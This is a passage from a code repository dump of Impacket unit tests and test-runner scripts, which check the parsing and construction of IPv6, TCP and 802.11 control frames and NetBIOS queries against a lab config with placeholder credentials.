1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | fi 32 | 33 | (( total++ )) 34 | done 35 | echo $separator 36 | echo Summary: 37 | echo " OK $ok/$total" 38 | echo " $failed FAILED" 39 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_IP6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #Impact test version 4 | try: 5 | from impacket import IP6_Address, IP6, ImpactDecoder 6 | except: 7 | pass 8 | 9 | #Standalone test version 10 | try: 11 | import sys 12 | sys.path.insert(0,"../..") 13 | import IP6_Address, IP6, ImpactDecoder 14 | except: 15 | pass 16 | 17 | import unittest 18 | 19 | class TestIP6(unittest.TestCase): 20 | 21 | def setUp(self): 22 | #Version 6, traffic class 72, flow label 148997, payload length 1500 23 | #next header 17 (UDP), hop limit 1 24 | #source addr FE80::78F8:89D1:30FF:256B 25 | #dest addr FF02::1:3 26 | self.binary_packet = [ 27 | 0x64, 0x82, 0x46, 0x05, 28 | 0x05, 0xdc, 0x11, 0x01, 29 | 0xfe, 0x80, 0x00, 0x00, 30 | 0x00, 0x00, 0x00, 0x00, 31 | 0x78, 0xf8, 0x89, 0xd1, 32 | 0x30, 0xff, 0x25, 0x6b, 33 | 0xff, 0x02, 0x00, 0x00, 34 | 0x00, 0x00, 0x00, 0x00, 35 | 0x00, 0x00, 0x00, 0x00, 36 | 0x00, 0x01, 0x00, 0x03] 37 | 38 | def test_decoding(self): 39 | '''Test IP6 Packet decoding.''' 40 | 41 | 42 | d = ImpactDecoder.IP6Decoder() 43 | parsed_packet = d.decode(self.binary_packet) 44 | 45 | protocol_version = parsed_packet.get_ip_v() 46 | traffic_class = parsed_packet.get_traffic_class() 47 | flow_label = parsed_packet.get_flow_label() 48 | payload_length = parsed_packet.get_payload_length() 49 | next_header = parsed_packet.get_next_header() 50 | hop_limit = parsed_packet.get_hop_limit() 51 | source_address = parsed_packet.get_ip_src() 52 | destination_address = parsed_packet.get_ip_dst() 53 | 54 | self.assertEquals(protocol_version, 6, "IP6 parsing - Incorrect protocol version") 55 | self.assertEquals(traffic_class, 72, "IP6 parsing - Incorrect traffic class") 56 | self.assertEquals(flow_label, 148997, "IP6 parsing - Incorrect flow label") 57 | self.assertEquals(payload_length, 1500, "IP6 parsing - Incorrect payload length") 58 | self.assertEquals(next_header, 17, "IP6 parsing - Incorrect next header") 59 | self.assertEquals(hop_limit, 1, "IP6 parsing - Incorrect hop limit") 60 | self.assertEquals(source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address") 61 | self.assertEquals(destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address") 62 | 63 | def test_creation(self): 64 | '''Test IP6 Packet creation.''' 65 | 66 | crafted_packet = IP6.IP6() 67 | crafted_packet.set_traffic_class(72) 68 | crafted_packet.set_flow_label(148997) 69 | crafted_packet.set_payload_length(1500) 70 | crafted_packet.set_next_header(17) 71 | crafted_packet.set_hop_limit(1) 72 | crafted_packet.set_ip_src("FE80::78F8:89D1:30FF:256B") 73 | crafted_packet.set_ip_dst("FF02::1:3") 74 | crafted_buffer = crafted_packet.get_bytes().tolist() 75 | self.assertEquals(crafted_buffer, self.binary_packet, "IP6 creation - Buffer mismatch") 76 | 77 | 78 | suite = unittest.TestLoader().loadTestsFromTestCase(TestIP6) 79 | unittest.TextTestRunner(verbosity=2).run(suite) 80 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_TCP_bug_issue7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactPacket import TCP, ImpactPacketException 8 | from binascii import hexlify 9 | import unittest 10 | from threading import Thread 11 | 12 | class TestTCP(unittest.TestCase): 13 | 14 | def setUp(self): 15 | # Dummy TCP header with "Maximum Segment Size" Option and zero length 16 | self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 17 | 18 | def test_01(self): 19 | 'Test TCP options parsing hangs' 20 | class it_hangs(Thread): 21 | def __init__(self): 22 | Thread.__init__(self) 23 | def run(self): 24 | try: 25 | frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \ 26 | '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 27 | tcp = TCP(frame) 28 | #except Exception,e: 29 | # print "aaaaaaaaaaaaaaa" 30 | # print e 31 | #except Exception,e: 32 | except ImpactPacketException,e: 33 | if str(e) != "'TCP Option length is too low'": 34 | raise e 35 | except: 36 | pass 37 | 38 | thread_hangs = it_hangs() 39 | thread_hangs.setDaemon(True) 40 | thread_hangs.start() 41 | thread_hangs.join(1.0) # 1 seconds timeout 42 | self.assertEqual(thread_hangs.isAlive(), False) 43 | #if thread_hang.isAlive(): 44 | 45 | 46 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTCP) 47 | unittest.TextTestRunner(verbosity=2).run(suite) 48 | 49 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/dcetests.cfg: -------------------------------------------------------------------------------- 1 | [global] 2 | 3 | [TCPTransport] 4 | servername = 5 | machine = 172.16.123.232 6 | username = test 7 | password = test 8 | hashes = 9 | aesKey256 = 10 | aesKey128 = 11 | domain = 12 | [SMBTransport] 13 | servername = 14 | machine = 172.16.123.232 15 | username = test 16 | password = test 17 | hashes = 18 | aesKey256 = 19 | aesKey128 = 20 | domain = 21 | 22 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/rundce.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | python test_rpcrt.py 9 | python test_scmr.py 10 | python test_epm.py 11 | python test_samr.py 12 | python test_wkst.py 13 | python test_srvs.py 14 | python test_lsad.py 15 | python test_lsat.py 16 | python test_rrp.py 17 | python test_mgmt.py 18 | python test_ndr.py 19 | python test_drsuapi.py 20 | python test_wmi.py 21 | python test_dcomrt.py 22 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/SMB_RPC/test_nmb.py: -------------------------------------------------------------------------------- 1 | import ConfigParser 2 | import unittest 3 | 4 | from impacket import nmb 5 | 6 | 7 | class NMBTests(unittest.TestCase): 8 | def create_connection(self): 9 | pass 10 | 11 | def test_getnetbiosname(self): 12 | n = nmb.NetBIOS() 13 | res = n.getnetbiosname(self.machine) 14 | print repr(res) 15 | self.assertTrue( self.serverName, res) 16 | 17 | def test_getnodestatus(self): 18 | n = nmb.NetBIOS() 19 | resp = n.getnodestatus(self.serverName.upper(), self.machine) 20 | print resp 21 | 22 | def test_gethostbyname(self): 23 | n = nmb.NetBIOS() 24 | n.set_nameserver(self.serverName) 25 | resp = n.gethostbyname(self.serverName, nmb.TYPE_SERVER) 26 | print resp.entries 27 | 28 | def test_name_registration_request(self): 29 | n = nmb.NetBIOS() 30 | # ToDo: Look at this 31 | #resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 32 | resp = n.name_registration_request('*JSMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_ONT_P, '1.1.1.2') 33 | resp.dump() 34 | 35 | def test_name_query_request(self): 36 | n = nmb.NetBIOS() 37 | # ToDo: Look at this 38 | # resp = n.name_registration_request('*SMBSERVER', self.serverName, nmb.TYPE_WORKSTATION, None,nmb.NB_FLAGS_G, '1.1.1.1') 39 | resp = n.name_query_request(self.serverName, self.machine) 40 | print resp.entries 41 | 42 | class NetBIOSTests(NMBTests): 43 | def setUp(self): 44 | NMBTests.setUp(self) 45 | # Put specific configuration for target machine with SMB1 46 | configFile = ConfigParser.ConfigParser() 47 | configFile.read('dcetests.cfg') 48 | self.serverName = configFile.get('SMBTransport', 'servername') 49 | self.machine = configFile.get('SMBTransport', 'machine') 50 | 51 | if __name__ == "__main__": 52 | suite = unittest.TestLoader().loadTestsFromTestCase(NetBIOSTests) 53 | unittest.TextTestRunner(verbosity=1).run(suite) 54 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/__init__.py: -------------------------------------------------------------------------------- 1 | pass 2 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.bat: -------------------------------------------------------------------------------- 1 | 2 | FOR /f "tokens=*" %%G IN ('dir /B *.py') DO %%G -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/runalltestcases.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | separator='======================================================================' 3 | #ls *.py | xargs -I{} --max-args=1 bash -c "echo -e '$separator\nExecuting: {}\n';python {}" 4 | #ls *.py | xargs --max-args=1 python 5 | 6 | export PYTHONPATH=../../..:$PYTHONPATH 7 | 8 | total=0 9 | ok=0 10 | failed=0 11 | for file in `ls *.py` ; do 12 | echo $separator 13 | echo Executing $file 14 | latest=$( 15 | python $file 2>&1 | { 16 | while read line; do 17 | echo " $line" 1>&2 18 | latest="$line" 19 | done 20 | echo $latest 21 | } 22 | ) 23 | #echo Latest ${latest} 24 | result=${latest:0:6} 25 | if [ "$result" = "FAILED" ] 26 | then 27 | (( failed++ )) 28 | elif [ "$result" = "OK" ] 29 | then 30 | (( ok++ )) 31 | else 32 | echo "WARNING: Unknown result!!!!!" 33 | (( failed++ )) 34 | fi 35 | 36 | (( total++ )) 37 | done 38 | echo $separator 39 | echo Summary: 40 | echo " OK $ok/$total" 41 | echo " $failed FAILED" 42 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_Dot11Decoder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactDecoder import Dot11Decoder #,Dot11Types 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11Decoder(unittest.TestCase): 12 | 13 | def setUp(self): 14 | self.WEPKey=None #Unknown 15 | self.WEPData='\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35' 16 | dot11_decoder = Dot11Decoder() 17 | self.in0=dot11_decoder.decode(self.WEPData) 18 | self.in1=self.in0.child() 19 | self.in2=self.in1.child() 20 | self.in3=self.in2.child() 21 | if self.WEPKey: 22 | self.in4=self.in3.child() 23 | self.in5=self.in4.child() 24 | 25 | def test_01_Dot11Decoder(self): 26 | 'Test Dot11 decoder' 27 | self.assertEqual(str(self.in0.__class__), "dot11.Dot11") 28 | 29 | def test_02_Dot11DataFrameDecoder(self): 30 | 'Test Dot11DataFrame decoder' 31 | self.assertEqual(str(self.in1.__class__), "dot11.Dot11DataFrame") 32 | 33 | def test_03_Dot11WEP(self): 34 | 'Test Dot11WEP decoder' 35 | self.assertEqual(str(self.in2.__class__), "dot11.Dot11WEP") 36 | 37 | def test_04_Dot11WEPData(self): 38 | 'Test Dot11WEPData decoder' 39 | 40 | if not self.WEPKey: 41 | return 42 | 43 | self.assertEqual(str(self.in3.__class__), "dot11.Dot11WEPData") 44 | 45 | # Test if wep data "get_packet" is correct 46 | wepdata='\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17' 47 | self.assertEqual(self.in3.get_packet(),wepdata) 48 | 49 | def test_05_LLC(self): 50 | 'Test LLC decoder' 51 | if self.WEPKey: 52 | self.assertEqual(str(self.in4.__class__), "dot11.LLC") 53 | 54 | def test_06_Data(self): 55 | 'Test LLC Data decoder' 56 | 57 | if self.WEPKey: 58 | dataclass=self.in4.__class__ 59 | else: 60 | dataclass=self.in3.__class__ 61 | 62 | self.assertTrue(str(dataclass).find('ImpactPacket.Data') > 0) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11Decoder) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame ACK 15 | self.frame_orig='\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT) 27 | 28 | self.ack = Dot11ControlFrameACK(d.get_body_as_string()) 29 | 30 | d.contains(self.ack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.ack.get_header_size(), 8) 35 | self.assertEqual(self.ack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.ack.get_duration(), 0) 41 | self.ack.set_duration(0x1234) 42 | self.assertEqual(self.ack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.ack.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.ack.set_ra(ra) 52 | self.assertEqual(self.ack.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlACK) 55 | unittest.TextTestRunner(verbosity=2).run(suite) 56 | 57 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEnd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEnd(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEnd 15 | self.frame_orig='\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END) 27 | 28 | self.cfend = Dot11ControlFrameCFEnd(d.get_body_as_string()) 29 | 30 | d.contains(self.cfend) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfend.get_header_size(), 14) 35 | self.assertEqual(self.cfend.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfend.get_duration(), 0x00) 41 | self.cfend.set_duration(0x1234) 42 | self.assertEqual(self.cfend.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfend.get_ra() 48 | self.assertEqual(ra.tolist(), [0xff,0xff,0xff,0xff,0xff,0xff]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfend.set_ra(ra) 52 | self.assertEqual(self.cfend.get_ra().tolist(), [0x12,0xff,0xff,0xff,0xff,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfend.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfend.set_bssid(bssid) 62 | self.assertEqual(self.cfend.get_bssid().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEnd) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCFEndCFACK.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCFEndCFACK(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CFEndCFACK 15 | self.frame_orig='\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK) 27 | 28 | self.cfendcfack = Dot11ControlFrameCFEndCFACK(d.get_body_as_string()) 29 | 30 | d.contains(self.cfendcfack) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cfendcfack.get_header_size(), 14) 35 | self.assertEqual(self.cfendcfack.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE) 41 | self.cfendcfack.set_duration(0x1234) 42 | self.assertEqual(self.cfendcfack.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cfendcfack.get_ra() 48 | self.assertEqual(ra.tolist(), [0xe5,0x56,0x85,0xf8,0xd2,0x3b]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.cfendcfack.set_ra(ra) 52 | self.assertEqual(self.cfendcfack.get_ra().tolist(), [0x12,0x56,0x85,0xf8,0xd2,0x34]) 53 | 54 | def test_04_BSSID(self): 55 | 'Test BSS ID field' 56 | 57 | bssid=self.cfendcfack.get_bssid() 58 | self.assertEqual(bssid.tolist(), [0x96,0xae,0x0f,0xb0,0xd9,0x8a]) 59 | bssid[0]=0x12 60 | bssid[5]=0x34 61 | self.cfendcfack.set_bssid(bssid) 62 | self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12,0xae,0x0f,0xb0,0xd9,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCFEndCFACK) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlCTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlCTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame CTS 15 | self.frame_orig='\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND) 27 | 28 | self.cts = Dot11ControlFrameCTS(d.get_body_as_string()) 29 | 30 | d.contains(self.cts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.cts.get_header_size(), 8) 35 | self.assertEqual(self.cts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.cts.get_duration(), 4667) 41 | self.cts.set_duration(0x1234) 42 | self.assertEqual(self.cts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.cts.get_ra() 48 | 49 | self.assertEqual(ra.tolist(), [0x00,0x19,0xe0,0x98,0x04,0xd4]) 50 | ra[0]=0x12 51 | ra[5]=0x34 52 | self.cts.set_ra(ra) 53 | self.assertEqual(self.cts.get_ra().tolist(), [0x12,0x19,0xe0,0x98,0x04,0x34]) 54 | 55 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlCTS) 56 | unittest.TextTestRunner(verbosity=2).run(suite) 57 | 58 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlPSPoll.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlPSPoll(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame PSPoll 15 | self.frame_orig='\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL) 27 | 28 | self.pspoll = Dot11ControlFramePSPoll(d.get_body_as_string()) 29 | 30 | d.contains(self.pspoll) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.pspoll.get_header_size(), 14) 35 | self.assertEqual(self.pspoll.get_tail_size(), 0) 36 | 37 | def test_02_AID(self): 38 | 'Test AID field' 39 | 40 | self.assertEqual(self.pspoll.get_aid(), 0xAFF1) 41 | self.pspoll.set_aid(0x1234) 42 | self.assertEqual(self.pspoll.get_aid(), 0x1234) 43 | 44 | def test_03_BSSID(self): 45 | 'Test BSS ID field' 46 | 47 | bssid=self.pspoll.get_bssid() 48 | self.assertEqual(bssid.tolist(), [0x48,0x06,0xee,0x23,0x2b,0xc9]) 49 | bssid[0]=0x12 50 | bssid[5]=0x34 51 | self.pspoll.set_bssid(bssid) 52 | self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12,0x06,0xee,0x23,0x2b,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.pspoll.get_ta() 58 | self.assertEqual(ta.tolist(), [0xfe,0xbe,0xe5,0x05,0x4c,0x0a]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.pspoll.set_ta(ta) 62 | self.assertEqual(self.pspoll.get_ta().tolist(), [0x12,0xbe,0xe5,0x05,0x4c,0x34]) 63 | 64 | suite = unittest.TestLoader().loadTestsFromTestCase(TestDot11FrameControlPSPoll) 65 | unittest.TextTestRunner(verbosity=2).run(suite) 66 | 67 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_FrameControlRTS.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from dot11 import Dot11,Dot11Types,Dot11ControlFrameRTS 8 | from binascii import hexlify 9 | import unittest 10 | 11 | class TestDot11FrameControlRTS(unittest.TestCase): 12 | 13 | def setUp(self): 14 | # 802.11 Control Frame RTS 15 | self.frame_orig='\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73' 16 | 17 | d = Dot11(self.frame_orig) 18 | 19 | type = d.get_type() 20 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL) 21 | 22 | subtype = d.get_subtype() 23 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND) 24 | 25 | typesubtype = d.get_type_n_subtype() 26 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND) 27 | 28 | self.rts = Dot11ControlFrameRTS(d.get_body_as_string()) 29 | 30 | d.contains(self.rts) 31 | 32 | def test_01_HeaderTailSize(self): 33 | 'Test Header and Tail Size field' 34 | self.assertEqual(self.rts.get_header_size(), 14) 35 | self.assertEqual(self.rts.get_tail_size(), 0) 36 | 37 | def test_02_Duration(self): 38 | 'Test Duration field' 39 | 40 | self.assertEqual(self.rts.get_duration(), 0x181) 41 | self.rts.set_duration(0x1234) 42 | self.assertEqual(self.rts.get_duration(), 0x1234) 43 | 44 | def test_03_RA(self): 45 | 'Test RA field' 46 | 47 | ra=self.rts.get_ra() 48 | self.assertEqual(ra.tolist(), [0x00,0x08,0x54,0xac,0x2f,0x85]) 49 | ra[0]=0x12 50 | ra[5]=0x34 51 | self.rts.set_ra(ra) 52 | self.assertEqual(self.rts.get_ra().tolist(), [0x12,0x08,0x54,0xac,0x2f,0x34]) 53 | 54 | def test_04_TA(self): 55 | 'Test TA field' 56 | 57 | ta=self.rts.get_ta() 58 | self.assertEqual(ta.tolist(), [0x00,0x23,0x4d,0x09,0x86,0xfe]) 59 | ta[0]=0x12 60 | ta[5]=0x34 61 | self.rts.set_ta(ta) 62 | self.assertEqual(self.rts.get_ta().tolist(), 